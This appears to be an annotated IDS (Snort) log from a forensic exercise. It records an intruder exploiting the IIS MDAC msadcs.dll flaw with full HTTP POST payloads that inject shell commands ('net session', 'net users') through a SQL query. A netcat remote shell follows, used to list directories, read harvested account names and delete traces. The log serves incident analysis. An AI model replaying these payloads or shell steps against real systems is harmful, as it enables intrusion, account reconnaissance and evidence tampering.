multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 348..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .s.e.s.s.i.o.n. .>.>.y.a.y.2...t.x.t.".).|.'.......d.r.i.v
.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m
.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t
.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WOR
LD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulenerability to run 'net session' command and redirect output to file 'c:\yay2.txt'.
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:47:55.733919 213.116.251.162:1924 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12474 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0xA2F0BD5C Ack: 0x2CC3551E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .s.e.s.s.i.o.n. .>.>.c.:.\.y.a.y.2...t.x.t.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:48:53.427873 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:29050 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEDC8C Ack: 0x9E43FC46 Win: 0x210B TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:48:53.996784 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:29306 IpLen:20 DgmLen:751 DF
***AP*** Seq: 0x2CBEDD54 Ack: 0x9E43FC46 Win: 0x210B TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:46a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt..02/04/01 06:46a
38 yay2.txt.. 14 File(s) 78,643,560
bytes.. 1,690,861,056 bytes free....C:\
>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses remote shell to read file 'c:\yay2.txt'. Nobody is connected.
[**] netcat session 6969 [**]
02/04-05:48:59.035475 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:31354 IpLen:20 DgmLen:105 DF
***AP*** Seq: 0x2CBEE01B Ack: 0x9E43FC55 Win: 0x20FC TcpLen: 20
type yay2.txt..There are no entries in the list........C:\>..C:\
>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses remote shell to clean up file 'c:\yay2.txt' (but not c:\Program Files\Common Files\system\msadc\yay2.txt)
[**] netcat session 6969 [**]
02/04-05:49:07.447963 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:33658 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0x2CBEE05C Ack: 0x9E43FC63 Win: 0x20EE TcpLen: 20
del yay2.txt....C:\>..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:07.919822 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:33914 IpLen:20 DgmLen:44 DF
***AP*** Seq: 0x2CBEE072 Ack: 0x9E43FC63 Win: 0x20EE TcpLen: 20
C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:14.057447 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37242 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x2CBEE076 Ack: 0x9E43FC7B Win: 0x20D6 TcpLen: 20
net session >>yay3.txt..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries 'net session' command again from remote shell but still doesn't have required priviledges
[**] netcat session 6969 [**]
02/04-05:49:14.394221 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37498 IpLen:20 DgmLen:107 DF
***AP*** Seq: 0x2CBEE08E Ack: 0x9E43FC7D Win: 0x20D4 TcpLen: 20
System error 5 has occurred......Access is denied........C:\>..C
:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:14.758914 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:37754 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEE0D1 Ack: 0x9E43FC80 Win: 0x20D1 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:15.318578 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:38010 IpLen:20 DgmLen:751 DF
***AP*** Seq: 0x2CBEE199 Ack: 0x9E43FC80 Win: 0x20D1 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:46a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt..02/04/01 06:48a
0 yay3.txt.. 14 File(s) 78,643,522
bytes.. 1,690,861,056 bytes free....C:\
>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:21.271333 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40314 IpLen:20 DgmLen:52 DF
***AP*** Seq: 0x2CBEE460 Ack: 0x9E43FC8E Win: 0x20C3 TcpLen: 20
del yay&.*..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:21.599220 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40570 IpLen:20 DgmLen:182 DF
***AP*** Seq: 0x2CBEE46C Ack: 0x9E43FC91 Win: 0x20C0 TcpLen: 20
Could Not Find C:\yay..The name specified is not recognized as a
n..internal or external command, operable program or batch file.
....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:22.144461 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:40826 IpLen:20 DgmLen:951 DF
***AP*** Seq: 0x2CBEE4FA Ack: 0x9E43FC91 Win: 0x20C0 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..11/26/00 12:34p 0 CONFIG.SYS..12/26
/00 07:36p exploits..12/07/00 03:30p
InetPub..12/07/00 03:12p
Multimedia Files..12/26/00 07:10p New
Folder..01/26/01 02:10p 78,643,200 pagefile.sys..12/
21/00 08:59p Program Files..12/21/00 08:
59p TEMP..02/04/01 06:46a
WINNT..12/26/00 07:09p wiretrip..0
2/04/01 06:43a 0 yay.txt..02/04/01 06:48a
0 yay3.txt.. 14 File(s) 78,
643,522 bytes.. 1,690,861,056 bytes fre
e....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Tries cleaning up a bit by running 'del yay.*'
!@# This deletes yay3.txt but looks like yay.txt is locked by another process.
[**] netcat session 6969 [**]
02/04-05:49:28.278508 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:42618 IpLen:20 DgmLen:156 DF
***AP*** Seq: 0x2CBEE889 Ack: 0x9E43FC9B Win: 0x20B6 TcpLen: 20
del yay*..C:\yay.txt..The process cannot access the file because
..it is being used by another process.....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:37.541896 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:45178 IpLen:20 DgmLen:94 DF
***AP*** Seq: 0x2CBEE8FD Ack: 0x9E43FCA9 Win: 0x20A8 TcpLen: 20
del yay3.txt..Could Not Find C:\yay3.txt....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:38.444008 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:45946 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEE933 Ack: 0x9E43FCAE Win: 0x20A3 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:49:38.944406 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:46202 IpLen:20 DgmLen:702 DF
***AP*** Seq: 0x2CBEE9FB Ack: 0x9E43FCAE Win: 0x20A3 TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..12/07/00 03:30p InetPub..12/07/00 03:12p Multi
media Files..12/26/00 07:10p New Folder..
01/26/01 02:10p 78,643,200 pagefile.sys..12/21/00 0
8:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:46a W
INNT..12/26/00 07:09p wiretrip..02/04/01
06:43a 0 yay.txt.. 13 File(s)
78,643,522 bytes.. 1,690,861,056 by
tes free....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerabiliy to run 'net users' and append output to file 'heh.txt'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:49:54.324722 213.116.251.162:1930 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12612 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0xA4B7CF0B Ack: 0x2CC52434 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .u.s.e.r.s. .>.>.h.e.h...t.x.t.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerabiliy to run 'net users' and append output to file 'c:\heh.txt'
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:50:00.058360 213.116.251.162:1932 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12622 IpLen:20 DgmLen:751 DF
***AP*** Seq: 0xA4CF1F07 Ack: 0x2CC53AC7 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 557..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 348..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .n
.e.t. .u.s.e.r.s. .>.>.c.:.\.h.e.h...t.x.t.".).|.'.......d.r.i.v
.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m
.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t
.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WOR
LD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:03.550356 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:51322 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEEC91 Ack: 0x9E43FCB3 Win: 0x209E TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\....11/26/00 12:34p
0 AUTOEXEC.BAT..11/26/00 06:57p 322 bo
ot.ini..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:04.096869 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:51578 IpLen:20 DgmLen:750 DF
***AP*** Seq: 0x2CBEED59 Ack: 0x9E43FCB3 Win: 0x209E TcpLen: 20
11/26/00 12:34p 0 CONFIG.SYS..12/26/00 07:
36p exploits..02/04/01 06:48a
263 heh.txt..12/07/00 03:30p InetP
ub..12/07/00 03:12p Multimedia Files..12/
26/00 07:10p New Folder..01/26/01 02:10p
78,643,200 pagefile.sys..12/21/00 08:59p Program Files..12/21/00 08:59p
TEMP..02/04/01 06:48a WINNT..12/26/00
07:09p wiretrip..02/04/01 06:43a
0 yay.txt.. 14 File(s) 78,643,785 b
ytes.. 1,690,861,056 bytes free....C:\>
..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:08.257201 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:53626 IpLen:20 DgmLen:172 DF
***AP*** Seq: 0x2CBEF01F Ack: 0x9E43FCC2 Win: 0x208F TcpLen: 20
yuper .......The name specified is not recognized as an..interna
l or external command, operable program or batch file.....C:\>..
C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Reads heh.txt from remote shell
[**] netcat session 6969 [**]
02/04-05:50:10.660668 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:54906 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEF0A3 Ack: 0x9E43FCCE Win: 0x2083 TcpLen: 20
type heh.txt....User accounts for \\.....-----------------------
--------------------------------------------------------..Admini
strator Guest IUSR_KENNY
..I
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:11.200217 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:55162 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0x2CBEF16B Ack: 0x9E43FCCE Win: 0x2083 TcpLen: 20
WAM_KENNY ..The command completed with one or more
errors........C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Cleans up 'c:\heh.txt' using remote shell
[**] netcat session 6969 [**]
02/04-05:50:15.267294 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:56698 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBEF1C4 Ack: 0x9E43FCDB Win: 0x2076 TcpLen: 20
del heh.txt....C:\>..C:\>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:20.575002 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59002 IpLen:20 DgmLen:96 DF
***AP*** Seq: 0x2CBEF1DD Ack: 0x9E43FCF0 Win: 0x2061 TcpLen: 20
cd program files....C:\Program Files>..C:\Program Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Checks out contents of 'c:\program files\'
[**] netcat session 6969 [**]
02/04-05:50:20.975829 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59258 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEF215 Ack: 0x9E43FCF2 Win: 0x205F TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files....12/21/00 08:59p
...12/21/00 08:59p
....12/0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:50:21.520033 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:59514 IpLen:20 DgmLen:645 DF
***AP*** Seq: 0x2CBEF2DD Ack: 0x9E43FCF2 Win: 0x205F TcpLen: 20
7/00 03:11p Common Files..12/21/00 08:59
p D4..12/07/00 03:23p
ICW-Internet Connection Wizard..12/07/00 03:37p
Microsoft FrontPage..12/07/00 03:34p
Mts..12/07/00 03:23p Outlook Expres
s..11/26/00 06:42p Plus!..12/16/00 06:54
p Syslogd..11/26/00 06:56p
Windows NT.. 11 File(s) 0 byte
s.. 1,690,861,056 bytes free....C:\Prog
ram Files>..C:\Program Files>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+